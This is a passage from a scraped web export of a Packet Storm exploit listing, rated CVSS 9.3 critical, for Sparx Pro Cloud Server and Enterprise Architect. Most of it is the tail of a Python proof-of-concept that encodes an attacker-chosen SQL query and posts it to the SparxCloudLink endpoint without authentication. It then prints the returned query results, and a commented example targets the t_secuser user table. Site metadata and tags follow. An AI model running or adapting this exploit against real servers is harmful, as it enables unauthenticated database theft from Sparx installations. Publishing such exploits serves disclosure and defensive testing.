string (Unicode)\\n        key       : key string (Unicode)\\n    \\n        Returns encoded string (printable ASCII 0x20\u20130x7E).\\n        \\&#8221;\\&#8221;\\&#8221;\\n        output_chars = []\\n        length = len(plaintext)\\n        key_len = len(key)\\n    \\n        for i, ch in 
enumerate(plaintext):\\n            # load plaintext character as integer\\n            c_val = ord(ch)\\n    \\n            # subtract 0x40\\n            c_val = c_val &#8211; 0x40\\n    \\n            # derive key value (word from key string)\\n            k_val = ord(key[(i+length) % key_len])\\n            \\n            # add key\\n            total = k_val + c_val\\n    \\n            # modulo 94\\n            total = total % 0x5E\\n    \\n            # add 0x20 (ensures printable ASCII)\\n            encoded_val = total + 0x20\\n    \\n            # append encoded character\\n            output_chars.append(chr(encoded_val))\\n    \\n        return \\&#8221;\\&#8221;.join(output_chars)\\n    \\n    \\n    def test(debug_type, debug_msg):\\n        print(\\&#8221;debug(%d): %s\\&#8221; % (debug_type, debug_msg))\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n    \\n        if (len(sys.argv)!=4):\\n            print(\\&#8221;Usage: \\&#8221;+sys.argv[0]+\\&#8221; URL_without_sparxcloudlink_path model_name sql\\&#8221;)\\n            exit(-1)\\n    \\n        host = sys.argv[1]\\n        repo = sys.argv[2]\\n        sqli = sys.argv[3]\\n        #url = \\&#8221;%s\/SparxCloudLink.sseap?model=%s\\&#8221;%(host,repo)\\n        url = \\&#8221;%s\/SparxCloudLink.sseap\\&#8221;%(host)\\n        print(url)    \\n        \\n        \\n        sqli = str(len(sqli))+\\&#8221;:\\&#8221;+sqli\\n        \\n        fill=\\&#8221;+d1XL|@\\&#8221;\\n        sqli += fill[-(7-(len(sqli)%7)):]\\n        print (sqli)\\n        #sqli=\\&#8221;23:Select * from t_secuser|@\\&#8221;\\n        ret=custom_encode(mangle(sqli),k)\\n        \\n        \\n        binary=bytes([0,0,0,1,0,0])\\n        binary+=bytes.fromhex(&#8216;%04X&#8217;%(len(ret)*2+66))\\n        \\n        \\n        binary+=bytes.fromhex(&#8216;%04X&#8217;%(len(repo)))\\n        for c in repo:\\n            binary+=bytes([ord(c),0])\\n        \\n        \\n        binary+=bytes([0,1,0,0])\\n        
binary+=bytes.fromhex(&#8216;%04X&#8217;%(len(ret)))\\n        \\n        for c in ret:\\n            binary+=bytes([ord(c),0])\\n        \\n        c=pycurl.Curl()\\n        c.setopt(pycurl.URL, url)\\n        c.setopt(pycurl.READDATA, BytesIO(binary))\\n        c.setopt(pycurl.POSTFIELDSIZE, len(binary))\\n        c.setopt(pycurl.POST, 1)\\n        c.setopt(pycurl.VERBOSE, 1)\\n        c.setopt(pycurl.DEBUGFUNCTION, test)\\n        c.setopt(pycurl.HTTPHEADER, [&#8216;Content-Type: &#8216; , &#8216;Accept: &#8216;, &#8216;EnterpriseArchitect-Build: 1527&#8217; , &#8216;EnterpriseArchitect-InternalBuild: 481&#8217; , &#8216;User-Agent: Enterprise Architect\/15.1.1527&#8217; , &#8216;Connection: Keep-Alive&#8217; , &#8216;Cache-Control: no-cache&#8217;])\\n        body = BytesIO()\\n        c.setopt(pycurl.WRITEDATA, body)\\n        c.setopt(pycurl.SSL_VERIFYPEER, 0)\\n        c.setopt(pycurl.SSL_VERIFYHOST, 0)\\n        c.perform()\\n        c.close()\\n        \\n        try:\\n            z = zipfile.ZipFile(body)\\n            print(z.read(&#8216;query.xml&#8217;).decode(&#8216;utf-8&#8217;))\\n        except zipfile.BadZipFile:\\n            
sys.stdout.buffer.write(body.getvalue())&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/221993&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.3,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:L\/SA:N&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/221993\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-26T16:00:43&#8243;,&#8221;description&#8221;:&#8221;Multiple vulnerabilities in Sparx Pro Cloud Server PCS versions 6.1 and below and Sparx Enterprise Architect versions 17.1 and below allow a remote unauthenticated attacker&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-56965","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head_json":{"article_published_time":"2026-05-26T11:36:19+00:00","author":"invoker"}}